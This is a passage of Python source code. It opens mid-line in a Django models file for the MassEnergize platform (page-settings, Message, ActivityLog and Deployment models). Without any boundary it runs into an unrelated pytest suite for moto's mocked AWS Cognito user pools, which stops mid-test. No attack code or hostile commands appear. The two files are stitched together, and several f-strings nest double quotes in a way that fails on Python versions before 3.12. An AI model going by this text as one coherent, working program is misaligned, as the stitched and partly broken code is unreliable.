models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, related_name="homepage_images", blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_links = models.JSONField(blank=True, null=True) featured_events = models.ManyToManyField(Event, blank=True) featured_stats = models.ManyToManyField(Data, blank=True) show_featured_events = models.BooleanField(default=True, blank=True) show_featured_stats = models.BooleanField(default=True, blank=True) show_featured_links = models.BooleanField(default=True, blank=True) show_featured_video = models.BooleanField(default=False, blank=True) featured_stats_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_stats_description = models.CharField(max_length=LONG_STR_LEN, blank=True) featured_events_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_events_description = models.CharField(max_length=LONG_STR_LEN, blank=True) show_footer_subscribe = models.BooleanField(default=True, blank=True) show_footer_social_media = models.BooleanField(default=True, blank=True) social_media_links = models.JSONField(blank=True, null=True) is_template = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "HomePageSettings - %s" % (self.community) def simple_json(self): res = model_to_dict( self, exclude=["images", "featured_events", "featured_stats"] ) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] res["community"] = get_json_if_not_none(self.community) res["featured_events"] = [i.simple_json() for i in self.featured_events.all()] res["featured_stats"] = [i.simple_json() for i in self.featured_stats.all()] return res class Meta: db_table = "home_page_settings" verbose_name_plural = "HomePageSettings" class ActionsPageSettings(models.Model): """ Represents the community's Actions page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ActionsPageSettings - %s" % (self.community) class Meta: db_table = "actions_page_settings" verbose_name_plural = "ActionsPageSettings" class ContactUsPageSettings(models.Model): """ Represents the community's ContactUs page settings. 
Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ContactUsPageSettings - %s" % (self.community) class Meta: db_table = "contact_us_page_settings" verbose_name_plural = "ContactUsPageSettings" class DonatePageSettings(models.Model): """ Represents the communities Donate page settings. Attributes ---------- see description under PageSettings one additional field: donation_link : str - link to donation url (if not contained within the HTML description) """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) donation_link = models.CharField(max_length=LONG_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "DonatePageSettings - %s" % (self.community) class Meta: db_table = "donate_page_settings" verbose_name_plural = "DonatePageSettings" class AboutUsPageSettings(models.Model): """ Represents the community's AboutUs page settings. 
Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) # image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() # res['images'] = [i.simple_json() for i in self.images.all()] res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "AboutUsPageSettings - %s" % (self.community) class Meta: db_table = "about_us_page_settings" verbose_name_plural = "AboutUsPageSettings" class ImpactPageSettings(models.Model): """ Represents the community's Impact page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ImpactPageSettings - %s" % (self.community) class Meta: db_table = "impact_page_settings" verbose_name_plural = "ImpactPageSettings" class TeamsPageSettings(PageSettings): """ Represents the community's Teams page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TeamsPageSettings - %s" % (self.community) class Meta: db_table = "teams_page_settings" verbose_name_plural = "TeamsPageSettings" class VendorsPageSettings(PageSettings): """ Represents the community's Vendors page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "VendorsPageSettings - %s" % (self.community) class Meta: db_table = "vendors_page_settings" verbose_name_plural = "VendorsPageSettings" class EventsPageSettings(PageSettings): """ Represents the community's Events page settings. 
Attributes ---------- see description under PageSettings """ def __str__(self): return "EventsPageSettings - %s" % (self.community) class Meta: db_table = "events_page_settings" verbose_name_plural = "EventsPageSettings" class TestimonialsPageSettings(PageSettings): """ Represents the community's Testimonials page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TestimonialsPageSettings - %s" % (self.community) class Meta: db_table = "testimonials_page_settings" verbose_name_plural = "TestimonialsPageSettings" class RegisterPageSettings(PageSettings): """ Represents the community's Registration page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "RegisterPageSettings - %s" % (self.community) class Meta: db_table = "register_page_settings" verbose_name_plural = "RegisterPageSettings" class SigninPageSettings(PageSettings): """ Represents the community's Signin page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "SigninPageSettings - %s" % (self.community) class Meta: db_table = "signin_page_settings" verbose_name_plural = "SigninPageSettings" class Message(models.Model): """ A class used to represent a Message sent on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) user_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) title = models.CharField(max_length=SHORT_STR_LEN) uploaded_file = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL ) email = models.EmailField(blank=True) user = models.ForeignKey( UserProfile, on_delete=models.SET_NULL, null=True, blank=True ) body = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True ) team = models.ForeignKey(Team, blank=True, on_delete=models.SET_NULL, null=True) have_replied = models.BooleanField(default=False, blank=True) have_forwarded = models.BooleanField(default=False, blank=True) is_team_admin_message = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) archive = models.BooleanField(default=False, blank=True) starred = models.BooleanField(default=False, blank=True) response = models.CharField(max_length=LONG_STR_LEN, blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True, null=True) def __str__(self): return f"{self.title}" def simple_json(self): res = model_to_dict(self) res["community"] = get_summary_info(self.community) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) res["created_at"] = self.created_at.strftime("%Y-%m-%d %H:%M") return res def full_json(self): res = self.simple_json() res["uploaded_file"] = get_json_if_not_none(self.uploaded_file) return res class Meta: ordering = ("title",) db_table = "messages" class ActivityLog(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) path = models.CharField(max_length=SHORT_STR_LEN, default="/") user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, null=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) created_at = models.DateTimeField(auto_now_add=True) status = models.CharField(max_length=SHORT_STR_LEN, default="success", blank=True) trace = models.JSONField(blank=True, null=True) request_body = models.JSONField(blank=True, 
        null=True)  # add response or error field

    def __str__(self):
        return self.path

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        res = self.simple_json()
        res["user"] = get_json_if_not_none(self.user)
        res["community"] = get_json_if_not_none(self.community)
        return res

    class Meta:
        ordering = ("path",)
        db_table = "activity_logs"


class Deployment(models.Model):
    """
    A class used to represent a Deployment of the MassEnergize Platform

    Attributes
    ----------
    """

    id = models.AutoField(primary_key=True)
    version = models.CharField(max_length=SHORT_STR_LEN, default="")
    deploy_commander = models.CharField(
        max_length=SHORT_STR_LEN, default="", blank=True
    )
    notes = models.CharField(max_length=LONG_STR_LEN, default="", blank=True)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.version

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        db_table = "deployments"
        ordering = ("-version",)
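# Illustrative sketch (an assumption, not part of the original code): how an
# ActivityLog row defined above might be recorded from request-handling code.
# `request`, `user_profile`, `community`, and `request_data` are hypothetical
# variables; only fields that exist on ActivityLog are used.
#
#   ActivityLog.objects.create(
#       path=request.path,
#       user=user_profile,          # a UserProfile, or None for anonymous requests
#       community=community,        # may be None
#       status="success",
#       request_body=request_data,  # any JSON-serializable dict
#   )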
import base64 import boto3 import json import os import random import re import moto.cognitoidp.models import requests import hmac import hashlib import uuid # noinspection PyUnresolvedReferences import sure # noqa # pylint: disable=unused-import from botocore.exceptions import ClientError, ParamValidationError from jose import jws, jwt from unittest import SkipTest import pytest from moto import mock_cognitoidp, settings from moto.cognitoidp.utils import create_id from moto.core import ACCOUNT_ID @mock_cognitoidp def test_create_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name, LambdaConfig={"PreSignUp": value}) result["UserPool"]["Id"].should_not.be.none result["UserPool"]["Id"].should.match(r"[\w-]+_[0-9a-zA-Z]+") result["UserPool"]["Arn"].should.equal( "arn:aws:cognito-idp:us-west-2:{}:userpool/{}".format( ACCOUNT_ID, result["UserPool"]["Id"] ) ) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) @mock_cognitoidp def test_create_user_pool_should_have_all_default_attributes_in_schema(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name) result_schema = result["UserPool"]["SchemaAttributes"] result_schema = {s["Name"]: s for s in result_schema} described_schema = conn.describe_user_pool(UserPoolId=result["UserPool"]["Id"])[ "UserPool" ]["SchemaAttributes"] described_schema = {s["Name"]: s for s in described_schema} for schema in result_schema, described_schema: for ( default_attr_name, default_attr, ) in moto.cognitoidp.models.CognitoIdpUserPoolAttribute.STANDARD_SCHEMA.items(): attribute = schema[default_attr_name] attribute["Required"].should.equal(default_attr["Required"]) attribute["AttributeDataType"].should.equal( default_attr["AttributeDataType"] ) attribute["Mutable"].should.equal(default_attr["Mutable"]) attribute.get("StringAttributeConstraints", None).should.equal( default_attr.get("StringAttributeConstraints", None) ) attribute.get("NumberAttributeConstraints", None).should.equal( default_attr.get("NumberAttributeConstraints", None) ) attribute["DeveloperOnlyAttribute"].should.be.false @mock_cognitoidp def test_create_user_pool_unknown_attribute_data_type(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) attribute_data_type = "Banana" with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=name, Schema=[{"Name": "custom", "AttributeDataType": attribute_data_type,},], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Validation error detected: Value '{attribute_data_type}' failed to satisfy constraint: Member must satisfy enum value set: [Boolean, Number, String, DateTime]" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_without_data_type(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[{"Name": "custom",},]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Invalid AttributeDataType input, consider using the provided AttributeDataType enum." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_defaults(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "string", "AttributeDataType": "String",}, {"Name": "number", "AttributeDataType": "Number",}, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["DeveloperOnlyAttribute"].should.be.false string_attribute["Mutable"].should.be.true string_attribute.get("StringAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["DeveloperOnlyAttribute"].should.be.false number_attribute["Mutable"].should.be.true number_attribute.get("NumberAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_custom_attribute_developer_only(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, }, ], ) # Note that this time we are looking for 'dev:xyz' attribute attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "dev:custom:banana" ) attribute["DeveloperOnlyAttribute"].should.be.true @mock_cognitoidp def test_create_user_pool_custom_attribute_required(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "banana", "AttributeDataType": "String", "Required": True}, ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Required custom attributes are not supported currently." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ {"Name": "email", "AttributeDataType": "Number"}, {"Name": "email", "DeveloperOnlyAttribute": True}, ], ids=["standard_attribute", "developer_only"], ) def test_create_user_pool_standard_attribute_with_changed_data_type_or_developer_only( attribute, ): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"You can not change AttributeDataType or set developerOnlyAttribute for standard schema attribute {attribute["Name"]}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_attribute_with_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string", "AttributeDataType": "String", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "number", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "boolean", "AttributeDataType": "Boolean", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["StringAttributeConstraints"].should.equal( {"MinLength": "10", "MaxLength": "20"} ) string_attribute.get("NumberAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["NumberAttributeConstraints"].should.equal( {"MinValue": "10", "MaxValue": "20"} ) number_attribute.get("StringAttributeConstraints").should.be.none boolean_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:boolean" ) boolean_attribute.get("NumberAttributeConstraints").should.be.none boolean_attribute.get("StringAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_attribute_partial_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string_no_min", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "10"}, }, { "Name": "string_no_max", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "10"}, }, { "Name": "number_no_min", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "10"}, }, { "Name": "number_no_max", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10"}, }, ], ) string_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_min" ) string_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_max" ) number_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_min" ) number_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == 
"custom:number_no_max" ) string_no_min["StringAttributeConstraints"]["MaxLength"].should.equal("10") string_no_min["StringAttributeConstraints"].get("MinLength", None).should.be.none string_no_max["StringAttributeConstraints"]["MinLength"].should.equal("10") string_no_max["StringAttributeConstraints"].get("MaxLength", None).should.be.none number_no_min["NumberAttributeConstraints"]["MaxValue"].should.equal("10") number_no_min["NumberAttributeConstraints"].get("MinValue", None).should.be.none number_no_max["NumberAttributeConstraints"]["MinValue"].should.equal("10") number_no_max["NumberAttributeConstraints"].get("MaxValue", None).should.be.none @mock_cognitoidp @pytest.mark.parametrize( ("constraint_type", "attribute"), [ ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "invalid_value"}, }, ), ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "invalid_value"}, }, ), ], ids=[ "invalid_min_length", "invalid_max_length", "invalid_max_value", "invalid_min_value", ], ) def test_create_user_pool_invalid_schema_values(constraint_type, attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Invalid {constraint_type} for schema attribute {attribute["Name"]}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2049"}, }, { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "2049"}, }, ], ids=["invalid_min_length", "invalid_max_length"], ) def test_create_user_pool_string_schema_max_length_over_2048(attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.{attribute["Name"]}: String attributes cannot have a length of more than 2048" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_string_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2", "MaxLength": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.email: Max length cannot be less than min length." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_number_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "2", "MaxValue": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.updated_at: Max value cannot be less than min value." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_add_custom_attributes(): conn = boto3.client("cognito-idp", "us-west-2") pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] custom_attribute = {"Name": "banana", "AttributeDataType": "String"} res = conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) res = conn.describe_user_pool(UserPoolId=pool_id) described_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:banana" ) # Skip verification - already covered by create_user_pool with custom attributes described_attribute.should_not.be.none @mock_cognitoidp def test_add_custom_attributes_existing_attribute(): conn = boto3.client("cognito-idp", "us-west-2") custom_attribute = { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, } pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[custom_attribute] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"custom:banana: Existing attribute already has name dev:custom:banana." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_list_user_pools(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) conn.create_user_pool(PoolName=name) result = conn.list_user_pools(MaxResults=10) result["UserPools"].should.have.length_of(1) result["UserPools"][0]["Name"].should.equal(name) @mock_cognitoidp def test_set_user_pool_mfa_config(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=name)["UserPool"]["Id"] # Test error for when neither token nor sms configuration is provided with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="ON", ) ex.value.operation_name.should.equal("SetUserPoolMfaConfig") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "At least one of [SmsMfaConfiguration] or [SoftwareTokenMfaConfiguration] must be provided." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when sms config is missing `SmsConfiguration` with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={}, MfaConfiguration="ON", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[SmsConfiguration] is a required member of [SoftwareTokenMfaConfiguration]." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when `SmsConfiguration` is missing `SnsCaller` # This is asserted by boto3 with pytest.raises(ParamValidationError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={"SmsConfiguration": {}}, MfaConfiguration="ON", ) # Test error for when `MfaConfiguration` is not one of the expected values with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="Invalid", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[MfaConfiguration] must be one of 'ON', 'OFF', or 'OPTIONAL'." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Enable software token MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("ON") mfa_config["SoftwareTokenMfaConfiguration"].should.equal({"Enabled": True}) # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("ON") # Disable MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="OFF", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("OFF") # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("OFF") # `SnsCallerArn` needs to be at least 20 long sms_config = {"SmsConfiguration": {"SnsCallerArn": "01234567890123456789"}} # Enable SMS MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration=sms_config, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["SmsMfaConfiguration"].should.equal(sms_config) mfa_config["MfaConfiguration"].should.equal("ON") @mock_cognitoidp def test_list_user_pools_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pools pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = 
conn.list_user_pools(MaxResults=max_results, NextToken=next_token) result_2["UserPools"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = pool_count + 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(pool_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, LambdaConfig={"PreSignUp": value}, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, ) result = conn.describe_user_pool(UserPoolId=user_pool_details["UserPool"]["Id"]) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Name" ].should.equal("verified_email") result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Priority" ].should.equal(1) @mock_cognitoidp def test_describe_user_pool_estimated_number_of_users(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(0) users_count = random.randint(2, 6) for _ in range(users_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) result = conn.describe_user_pool(UserPoolId=user_pool_id) 